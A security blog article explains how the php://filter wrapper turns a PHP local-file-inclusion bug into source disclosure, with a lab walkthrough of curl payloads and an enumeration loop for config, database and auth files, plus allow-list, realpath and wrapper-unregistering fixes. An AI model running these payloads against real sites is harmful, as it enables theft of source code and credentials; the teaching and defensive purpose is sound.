TechEarl

php://filter Source Disclosure: How Attackers Read PHP Source via LFI

Ishan Karunaratne

php://filter is the LFI primitive that turns a seemingly contained include() bug into verbatim source disclosure, which is how a great many PHP applications end up with their credentials stolen. It is not a vulnerability in PHP. It is a legitimate stream-processing feature that, layered on top of a vulnerable include() sink, lets an attacker pull the verbatim source of every PHP file whose path they can name or guess, in a sequence of plain GET requests. This article is the variant deep dive for the wrapper itself, sitting under the broader path traversal and LFI practitioner guide.

TL;DR

php://filter is a PHP stream wrapper that lets you compose filters (base64 encoding, character-set conversion, compression) over any file the engine can open. Pointed at a vulnerable LFI sink with convert.base64-encode, the wrapper streams the target file through base64 before include() ever tries to parse it as code, so the PHP engine echoes the encoded source back into the response instead of executing it. The attacker decodes the response and now has the verbatim source of config.php, db.php, every endpoint, every hard-coded credential. The trick works against the most common "fix" for classic LFI (appending .php to the requested filename), works whether or not allow_url_fopen is on (it is not a URL fetch, it is a stream wrapper), and works whether or not open_basedir is set against the docroot. The fix is upstream of the wrapper: stop passing user input to include, use an ID-to-path allow-list, and treat source disclosure as the recon step it is.

What php://filter actually is

php://filter is one of the streams exposed by the php:// wrapper (php://input is another), which PHP ships in the core alongside file://, http://, ftp://, and data://. Wrappers are the abstraction that lets fopen, file_get_contents, include, and friends treat a URL-shaped string as a stream regardless of where the bytes actually live.

The filter wrapper is special among the family because it does not open a resource of its own. It opens a resource specified by its resource= argument and applies a chain of filters to the bytes as they flow through. The filters themselves are documented in the manual under filter types and split into four families: string filters (string.toupper, string.tolower, string.rot13, and string.strip_tags, the last deprecated since PHP 7.3), conversion filters (convert.base64-encode, convert.base64-decode, convert.quoted-printable-encode, convert.quoted-printable-decode, convert.iconv.*), compression filters (zlib.deflate, zlib.inflate, bzip2.compress, bzip2.decompress), and encryption filters (mcrypt.* and mdecrypt.*, deprecated in PHP 7.1 and gone from the core once the mcrypt extension was removed in PHP 7.2).

The general shape is:

code
php://filter/<filter-1>/<filter-2>/.../resource=<underlying-path>

A legitimate use looks like reading a file and getting its contents in upper case in one call:

php
$shouty = file_get_contents('php://filter/string.toupper/resource=README.txt');

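Or piping a raw-deflate file through zlib.inflate and writing the result somewhere else (a gzip file would go through the compress.zlib:// wrapper instead, which already decompresses on its own, so stacking zlib.inflate on top of it would fail):

php
copy('php://filter/read=zlib.inflate/resource=archive.deflate', 'out.bin');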

These are not security bugs. They are the feature working as designed. The bug is what happens when the underlying resource= argument is attacker-controlled and the consumer is include().
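To make the chain syntax concrete, here is a minimal sketch that writes a scratch file and reads it back through two filters. The scratch path from tempnam is an assumption of the example, not something from the lab. The sketch uses the explicit read= form with | as the separator and relies on filters running left to right.

```php
<?php
// Hypothetical scratch file; any readable path works as the resource.
$path = tempnam(sys_get_temp_dir(), 'flt');
file_put_contents($path, "hello filter\n");

// Filters run left to right: upper-case first, then base64-encode.
$chained = file_get_contents(
    "php://filter/read=string.toupper|convert.base64-encode/resource=$path"
);

// Undo the last filter to see what the first one produced.
$decoded = base64_decode($chained, true);

echo $chained, "\n";
echo $decoded;

unlink($path);
```

Nothing here is attacker-specific. It is the same composition the source-disclosure payload relies on, minus the include().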

The source-disclosure primitive

The canonical vulnerable PHP, the same shape covered in the parent path traversal article:

php
$page = $_GET['page'];
include($page . '.php');

Classic traversal fails here because the engine appends .php. A request for ?page=../../../../etc/passwd makes the engine look for /etc/passwd.php, find nothing, and return a warning. The suffix is the "fix" the developer reached for after reading a 2008 LFI tutorial, and against pre-wrapper attacks it works.

The php://filter payload:

code
GET /view.php?page=php://filter/convert.base64-encode/resource=pages/about

Walk through what the engine actually does:

  1. include($_GET['page'] . '.php') becomes include('php://filter/convert.base64-encode/resource=pages/about.php').
  2. The include opens that path as a stream. The filter wrapper recognises its own scheme, parses the path segments, and registers convert.base64-encode as the read filter.
  3. The wrapper opens the underlying resource, pages/about.php, as a normal file.
  4. As the file's bytes are read into the include's buffer, the base64 filter encodes them. What include() sees is no longer <?php $title = 'About'; ... ?>, it is PD9waHAgJHRpdGxlID0gJ0Fib3V0Jzs....
  5. The PHP engine tries to parse those bytes as PHP source. There are no <?php open tags inside the base64 alphabet, so the engine treats the whole stream as literal output (the same behaviour as a .txt file passed to include), and echoes it into the response body.
  6. The response now contains the base64-encoded source of pages/about.php. The attacker pipes the response through base64 -d and has the verbatim source.

The suffix is the part the wrapper composes with. pages/about.php is exactly the file the wrapper opens, because the appended .php rides along as part of the resource= value. The developer's "fix" became part of the working payload.
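The six steps above can be reproduced locally without the lab. This is a sketch under stated assumptions: the scratch directory name and the one-line about.php are invented for the example, and output buffering stands in for the HTTP response.

```php
<?php
// Scratch stand-in for pages/about.php; the directory name is hypothetical.
$dir = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
$source = "<?php \$title = 'About'; echo \"<h1>\$title</h1>\";\n";
file_put_contents("$dir/about.php", $source);

// Attacker-controlled value; the sink appends the suffix itself.
$page = "php://filter/convert.base64-encode/resource=$dir/about";

// Same shape as the vulnerable sink, with the output captured instead of sent.
ob_start();
include($page . '.php');
$body = ob_get_clean();

// The page never ran: the body is base64 text, not rendered HTML.
$recovered = base64_decode($body, true);
echo $body, "\n";
echo $recovered;

unlink("$dir/about.php");
rmdir($dir);
```

If the include had executed the file, the body would contain the rendered heading. Instead it decodes back to the original source bytes.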

Why disabling allow_url_fopen does not stop it

The most common piece of LFI advice I read in 2016-era hardening guides is "set allow_url_fopen=Off and you are safe from the wrappers". It is wrong, and it has been wrong since the wrappers shipped. allow_url_fopen gates the URL-fetching wrappers, the ones that talk to a network, specifically http://, https://, ftp://, and ftps://. It does not gate php://, data://, or file://. From the PHP runtime configuration reference:

allow_url_fopen boolean. Enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol [...].

php://filter is not a URL-aware fetch; it is a stream that operates on the underlying file API. The same is true of php://input, data://, and php://memory. Turning allow_url_fopen off is good practice for other reasons (it kills SSRF-via-file_get_contents, it removes the http:// include path that legacy code reaches for), but it does nothing for the source-disclosure primitive.

The directive that does kill the worst LFI chains is allow_url_include, and even that only blocks remote includes and the php://input and data:// code-execution chains, not source disclosure. php://filter over a local file works with either setting.

open_basedir is similarly weak here. It restricts which directories the filesystem functions can reach, but the entire LFI surface is the application's own docroot, which is inside open_basedir by definition. The wrapper happily reads every PHP file the application ships, which is exactly what the attacker wants. open_basedir only earns its keep if the attacker tries to reach /etc/passwd or /proc/self/environ, and those reads are not the high-value target. The source is.
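One way to check these claims on your own build is to start PHP with the directives turned off and attempt the read. This is a rough sketch: check.php is a hypothetical filename, the scratch file stands in for an application source file, and it assumes the temp directory is not excluded by an open_basedir setting.

```php
<?php
// Run as: php -d allow_url_fopen=0 -d allow_url_include=0 check.php
// (check.php is a hypothetical filename for this sketch.)
$path = tempnam(sys_get_temp_dir(), 'cfg');
$source = "<?php \$db_pass = 'not-a-real-secret';\n";
file_put_contents($path, $source);

// Report the directives the section discusses.
foreach (['allow_url_fopen', 'allow_url_include', 'open_basedir'] as $name) {
    printf("%-18s = %s\n", $name, var_export(ini_get($name), true));
}

// Attempt the same wrapper read the payload depends on.
$encoded = @file_get_contents("php://filter/convert.base64-encode/resource=$path");
$readable = $encoded !== false && base64_decode($encoded, true) === $source;

echo 'php://filter read ', $readable ? 'succeeded' : 'failed', "\n";
unlink($path);
```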

Lab walkthrough

For everything below I am attacking the lfi-basic target from the techearl-labs companion repo, the same target used by the parent path traversal article. The two relevant endpoints:

Endpoint                              Sink shape
/view.php?page=pages/about            include($_GET['page'] . '.php'), .php is appended
/view-raw.php?page=pages/about.php    include($_GET['page']), raw, no suffix

Boot the lab:

bash
docker compose up lfi-basic

The lab listens on http://localhost:8084.

Step 1: read the first source file

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'

The response is the normal page chrome wrapped around a long base64 blob where the page body would normally appear. Extract and decode:

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Out comes the verbatim source of pages/about.php. Same shape against pages/contact, pages/home, every page the application exposes.
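For scripting the same extraction outside a shell, the grep and base64 -d pipeline translates to a few lines of PHP. This is a sketch: the function name extractSources and the synthetic response body are assumptions for illustration, and the 40-character threshold mirrors the grep pattern above.

```php
<?php
/**
 * Pull base64 runs of 40+ characters out of a response body and decode them.
 * Runs that do not decode cleanly are skipped.
 */
function extractSources(string $body): array
{
    preg_match_all('~[A-Za-z0-9+/=]{40,}~', $body, $matches);
    $sources = [];
    foreach ($matches[0] as $blob) {
        $decoded = base64_decode($blob, true);
        if ($decoded !== false) {
            $sources[] = $decoded;
        }
    }
    return $sources;
}

// Synthetic response standing in for the lab's page chrome around the blob.
$source = "<?php \$title = 'About';\n\$db_pass = 'not-a-real-secret';\n";
$body = '<html><body><nav>Home</nav>' . base64_encode($source)
      . '<footer>demo</footer></body></html>';

$found = extractSources($body);
echo $found[0];
```

As with the grep version, a page that contains other long alphanumeric runs will produce extra candidates, so treat the output as a list to review, not a single answer.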

Step 2: enumerate the application's source

The interesting files are not the page templates, they are the dispatchers, the database layer, and the shared layout. Walk them:

bash
for r in view view-raw shared/layout shared/header shared/footer config db includes/auth includes/session; do
  echo "=== $r.php ==="
  curl -s "http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=$r" \
    | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d
  echo
done

Most of those paths return errors or empty output (the file does not exist), and the ones that do return source hand back the sink shape of every other endpoint plus any credentials hard-coded in the codebase. Exactly the recon I want before I move on to writing the RCE payload.

Step 3: read the sink itself

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=view' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Reading the source of view.php itself tells the attacker exactly which sink shape is in play (include($_GET['page'] . '.php')), which is the prerequisite for choosing between the source-disclosure, php://input RCE, and log-poisoning chains documented in the parent article.

What attackers do with the source

Source disclosure is not the goal. It is the recon step that unlocks everything else. The five things I look for once I have the source of a PHP app:

  1. Hard-coded database credentials. db.php, config.php, wp-config.php, .env loaders. Database creds in source are still the modal config pattern in 2026 for small PHP applications, and the source-disclosure primitive pulls them straight out.
  2. API keys and signing secrets. Stripe secret keys, AWS access keys, JWT signing secrets, session encryption keys, CSRF token secrets. Anywhere the source instantiates a third-party SDK, the key is one read away.
  3. The exact sink shape of other endpoints. Knowing whether /upload.php validates extensions, whether /admin.php does an authentication check, whether /redirect.php does open-redirect validation, all of that comes free with the source. Black-box probing becomes white-box analysis.
  4. Backdoor admin endpoints. Forgotten /_debug.php, /install.php that never got deleted, /health.php that exposes phpinfo(). Source walks reveal them; brute-forcing URLs does not.
  5. Cryptographic mistakes. Static IVs, ECB-mode encryption, md5($password . $salt) patterns, JWT verification that calls the wrong function. Source review of the auth path tells you whether the session tokens are forgeable, which is the next chain after credential disclosure.

The pattern is consistent: source disclosure compresses a multi-week black-box test into a one-afternoon code review. That is why I treat it as a higher-severity outcome than people who categorise it as "information disclosure" suggest.
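The first two items on that list are mechanical enough to script. The sketch below flags lines in recovered source that look like hard-coded secrets. The function name and the three patterns are illustrative assumptions, nowhere near a complete ruleset, and the sample input uses placeholder values only.

```php
<?php
/**
 * Flag lines in recovered source that look like hard-coded secrets.
 * The patterns are illustrative assumptions, not a complete ruleset.
 */
function findSecretCandidates(string $source): array
{
    $patterns = [
        'credential assignment' => '/\$\w*(pass|pwd|secret|token|key)\w*\s*=\s*[\'"][^\'"]+[\'"]/i',
        'AWS access key id'     => '/\bAKIA[0-9A-Z]{16}\b/',
        'Stripe live secret'    => '/\bsk_live_[0-9A-Za-z]+/',
    ];
    $hits = [];
    foreach (explode("\n", $source) as $index => $line) {
        foreach ($patterns as $label => $regex) {
            if (preg_match($regex, $line)) {
                $hits[] = ['line' => $index + 1, 'kind' => $label];
            }
        }
    }
    return $hits;
}

// Placeholder input; the key is the example value from AWS documentation.
$recovered = <<<'PHP'
<?php
$db_host = 'localhost';
$db_pass = 'not-a-real-password';
$aws_id  = 'AKIAIOSFODNN7EXAMPLE';
PHP;

foreach (findSecretCandidates($recovered) as $hit) {
    printf("line %d: %s\n", $hit['line'], $hit['kind']);
}
```

The same script is useful on the defensive side: run it over your own repository to see what a source-disclosure bug would hand over.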

Other useful filters

convert.base64-encode is the workhorse, but a handful of other filters earn their keep:

  • string.toupper / string.tolower. Useful when a sink does case-insensitive comparison against a known string and you want to flip the case of the included content. Niche but occasionally decisive.
  • convert.iconv.*. Character-set conversion filters. The 2024 PHP filter chain RCE class, tracked as CVE-2024-2961, exploits an out-of-bounds write (up to 4 bytes past the output buffer) in glibc's iconv ISO-2022-CN-EXT converter that PHP exposes via the iconv filter. Chained with php://filter, the bug becomes a memory-corruption primitive callable from any LFI sink, which several public exploit kits turned into RCE against PHP applications running on glibc-based distros. Verify the exact CVE ID, the affected glibc versions, and the patch status against the NVD entry for CVE-2024-2961 before quoting specifics; my point here is structural, the iconv filter family has a real exploit history beyond the source-disclosure shape.
  • zlib.deflate / zlib.inflate. Compress or decompress the stream on the fly. Useful when the target file is already compressed (rare) and occasionally as a size-manipulation trick to land a payload within a length-limited buffer.
  • convert.base64-decode. The inverse of the source-disclosure filter. Useful when feeding an already-base64 encoded payload into a sink that decodes-and-executes, which shows up in some upload-handler bugs.

The filter family is general-purpose stream processing. The source-disclosure shape is what happens when you point it at a file-include sink. The iconv chain is what happens when you point it at a vulnerable C-level converter. The wrapper itself is not "bad"; it is sharp.
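As a small illustration of the size-manipulation point, the sketch below compares a plain base64 read with a deflate-then-base64 read of the same file. The repetitive scratch file is an assumption chosen because it compresses well, and the example needs the zlib extension for both the filter and gzinflate.

```php
<?php
// Hypothetical scratch file with highly repetitive content.
$path = tempnam(sys_get_temp_dir(), 'big');
$original = str_repeat("<?php // padding line that compresses well\n", 100);
file_put_contents($path, $original);

// Plain disclosure chain versus compress-then-encode.
$plain  = file_get_contents("php://filter/read=convert.base64-encode/resource=$path");
$packed = file_get_contents("php://filter/read=zlib.deflate|convert.base64-encode/resource=$path");

// Reverse the chain in the opposite order: base64-decode, then inflate.
$restored = gzinflate(base64_decode($packed, true));

printf("base64 only: %d bytes, deflate+base64: %d bytes\n", strlen($plain), strlen($packed));
unlink($path);
```

The filter emits raw deflate data, which is why gzinflate (not gzdecode) is the matching decoder on the receiving side.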

The fix

The headline rule is the same as for the rest of the LFI surface: do not pass user-controlled input to include, require, include_once, require_once, fopen, file_get_contents, readfile, or SplFileObject. If the input has to drive a file choice, map it through an allow-list.

php
$pages = [
  'about'   => '/srv/app/pages/about.php',
  'contact' => '/srv/app/pages/contact.php',
  'home'    => '/srv/app/pages/home.php',
];
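$key = $_GET['page'] ?? 'home';
// Reject non-string input (?page[]=x) and any key that is not on the list.
if (!is_string($key) || !isset($pages[$key])) {
  http_response_code(404);
  exit;
}
// Only a path from the hard-coded map ever reaches include.
include($pages[$key]);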

The user controls a key into a map, never a path. The wrapper has nothing to attach to because there is no concatenation step.
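Pulling the lookup into a function makes the property easy to test. This is a sketch, with resolvePage as a hypothetical helper name and the same illustrative paths as the map above.

```php
<?php
/**
 * Return the file for a page key, or null when the key is not on the list.
 * $key is left untyped so array input such as ?page[]=x can be rejected here.
 */
function resolvePage(array $pages, $key): ?string
{
    if (!is_string($key)) {
        return null;
    }
    return $pages[$key] ?? null;
}

$pages = [
    'about'   => '/srv/app/pages/about.php',
    'contact' => '/srv/app/pages/contact.php',
    'home'    => '/srv/app/pages/home.php',
];

$attempts = [
    'about',
    '../../etc/passwd',
    'php://filter/convert.base64-encode/resource=config',
];
foreach ($attempts as $attempt) {
    printf("%-52s => %s\n", $attempt, resolvePage($pages, $attempt) ?? 'rejected');
}
```

The wrapper payload is rejected for the same reason as any other unknown string: it is not a key in the map.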

If for some reason the application genuinely has to accept a path fragment (legacy CMS, plugin loader), the canonical defence is realpath plus a prefix check, as covered in the parent article:

php
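// Canonical base directory; realpath() also resolves symlinks.
$base = realpath(__DIR__ . '/pages');
// realpath() returns false unless the candidate resolves to an existing file.
$target = realpath($base . '/' . $_GET['page'] . '.php');
// The resolved path must sit under $base (str_starts_with needs PHP 8.0+).
if ($base === false || $target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
  http_response_code(403);
  exit('Forbidden');
}
include($target);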

realpath returns false for any path that does not resolve to an existing file or directory, and php://filter/... is not a filesystem path, so $target is false and the request gets a 403 before the string ever reaches include. This is the part that actually closes the wrapper attack: the wrapper depends on the sink accepting a stream-shaped string, and here the include only ever receives a concrete, canonicalised path under the base directory.
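The check can be exercised against a scratch directory to see all three outcomes. This is a sketch: resolveUnderBase and the directory layout are assumptions made for the example, and str_starts_with requires PHP 8.0 or later.

```php
<?php
/**
 * Resolve "$fragment.php" under $baseDir, or return null when the result
 * does not exist or escapes the base directory.
 */
function resolveUnderBase(string $baseDir, string $fragment): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . '/' . $fragment . '.php');
    if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $target;
}

// Hypothetical scratch layout: one allowed page, one file outside the base.
$root = sys_get_temp_dir() . '/realpath-demo-' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/about.php", "<?php echo 'about';\n");
file_put_contents("$root/secret.php", "<?php \$k = 'not-a-real-secret';\n");

$results = [];
foreach (['about', '../secret', 'php://filter/convert.base64-encode/resource=about'] as $case) {
    $results[$case] = resolveUnderBase("$root/pages", $case);
    printf("%-52s => %s\n", $case, $results[$case] ?? 'rejected');
}

// Clean up the scratch files.
unlink("$root/pages/about.php");
unlink("$root/secret.php");
rmdir("$root/pages");
rmdir($root);
```

The traversal case resolves to a real file and is caught by the prefix check. The wrapper case never resolves at all.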

A more aggressive defence is to forbid stream wrappers entirely at the engine level. PHP exposes stream_wrapper_unregister for this:

php
foreach (['php', 'data', 'phar', 'expect'] as $w) {
  if (in_array($w, stream_get_wrappers(), true)) {
    @stream_wrapper_unregister($w);
  }
}

Run this at the start of every entry point. It removes the php://, data://, phar://, and expect:// wrappers from the process for the lifetime of the request, so even a vulnerable sink cannot resolve php://filter/.... There is a cost: unregistering php takes every php:// stream with it, so anything legitimate that uses php://input, php://output, php://memory, or php://temp (rare in application code, common in libraries) stops working. Verify against your own application before shipping this.
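A quick way to confirm the effect is to attempt the same read before and after unregistering. This is a sketch with a hypothetical scratch file. It restores the wrapper afterwards with stream_wrapper_restore so the rest of the script is unaffected.

```php
<?php
// Hypothetical scratch file standing in for an application source file.
$path = tempnam(sys_get_temp_dir(), 'unr');
file_put_contents($path, "<?php \$secret = 'not-a-real-secret';\n");
$url = "php://filter/convert.base64-encode/resource=$path";

// With the wrapper registered, the read returns base64 text.
$before = @file_get_contents($url);

// Without it, the string no longer resolves to a stream and the read should fail.
stream_wrapper_unregister('php');
$after = @file_get_contents($url);
stream_wrapper_restore('php');

var_dump(is_string($before));
var_dump($after);

unlink($path);
```

The restore call is there only to keep the demo tidy. In the hardening use case you would leave the wrapper unregistered for the whole request.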

There is no flag-flip that "turns off php://filter" specifically. The wrapper is registered as part of the PHP core build. The choices are: do not pass user input to the sinks, unregister the wrappers per-request, or do not have the LFI bug in the first place.

Real-world incidents

A short tour of php://filter in production exploits. As with the parent article, the version-specific details age fast; verify against the linked advisory before quoting numbers.

  • CVE-2024-2961, glibc iconv out-of-bounds write reached via PHP filter chains. Disclosed by Charles Fol of Ambionics in April 2024. The bug is a memory-corruption issue in glibc's iconv ISO-2022-CN-EXT converter, but the exploit surface that made it widely weaponisable is the PHP iconv filter, which exposes the affected converter to any LFI sink via a crafted php://filter/convert.iconv.* chain. Several public exploits chain it into RCE against vulnerable PHP applications running on common Linux distros. Verify the CVE ID and the glibc patch status against the NVD entry before quoting specifics; my own check is that the disclosure date is April 2024 and the fix is in glibc 2.40, but treat that as a starting point for your own verification.
  • The "PHP filter chains for RCE" class generally. Before CVE-2024-2961, public research (widely circulated from 2022, notably through Synacktiv's php_filter_chain_generator tool) showed that chaining convert.iconv.* and convert.base64-* filters can prepend attacker-chosen bytes to a stream, which turns an include() sink into code execution without any file being written to disk. The class is bigger than the single CVE: that technique needs no memory corruption at all, and any future bug in an iconv converter reachable through the filter adds another path to RCE from the same sink.
  • WordPress LFI plugins. Search the WPScan vulnerability database for "Local File Inclusion" and pick any year. Every quarter ships at least one popular plugin with a ?file= parameter going straight into include, and every one of those is a php://filter source-disclosure primitive against the rest of the WordPress install (wp-config.php falls first, the database credentials follow). The pattern repeats in the Joomla and Drupal extension ecosystems on a similar cadence.
  • The CTF curriculum. php://filter has been a canonical "second-level" LFI challenge across picoCTF, Hack The Box, and TryHackMe boxes since the 2010s. The reason CTF authors keep using it is that it shows up against real applications often enough that learners need to recognise the shape on sight.

Where to go next

php://filter is what makes LFI worse than the "read /etc/passwd" demo suggests. The suffix fix that buys a junior pentester a coffee buys an attacker the application source, every credential, and the sink shape of every other endpoint. The real fix is the same as the rest of the LFI surface: stop letting user input become a path. Map IDs to files, reject everything else, and the wrapper has nothing to attach to.


